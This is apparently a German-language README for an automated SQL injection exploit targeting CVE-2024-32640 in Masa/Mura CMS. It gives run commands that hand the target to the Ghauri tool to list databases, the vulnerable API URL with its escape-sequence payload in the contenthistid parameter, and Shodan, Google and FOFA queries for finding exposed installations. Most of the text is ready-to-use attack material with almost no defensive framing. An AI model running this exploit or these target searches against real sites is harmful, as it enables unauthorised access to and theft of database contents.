
CVE-2024-32640 | Automatisierte SQLi-Exploitation PoC
python3 CVE-2024-32640.py --url https://target.com/
Übergib alle Argumente, die du mit Ghauri verwenden möchtest, gemäß deren Argumentliste:
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Unter Verwendung der Erkennung, die ich in das Tool implementiert habe, können wir dann das verwundbare Ziel mit Ghauri ausnutzen. Das Skript automatisiert diesen Prozess, indem es alle benötigten Zielinformationen analysiert und in einen Aufruf an Ghauri übergibt.

Durch Anhängen einer Escape-Sequenz (%5c) an den Wert des HTML-Query-Parameters contenthisid können wir überprüfen, ob ein Ziel für diese SQLi anfällig ist.
Eine erfolgreiche Ausnutzung könnte zu unbefugtem Zugriff auf sensible Daten führen.
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Shodan-Abfrage: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"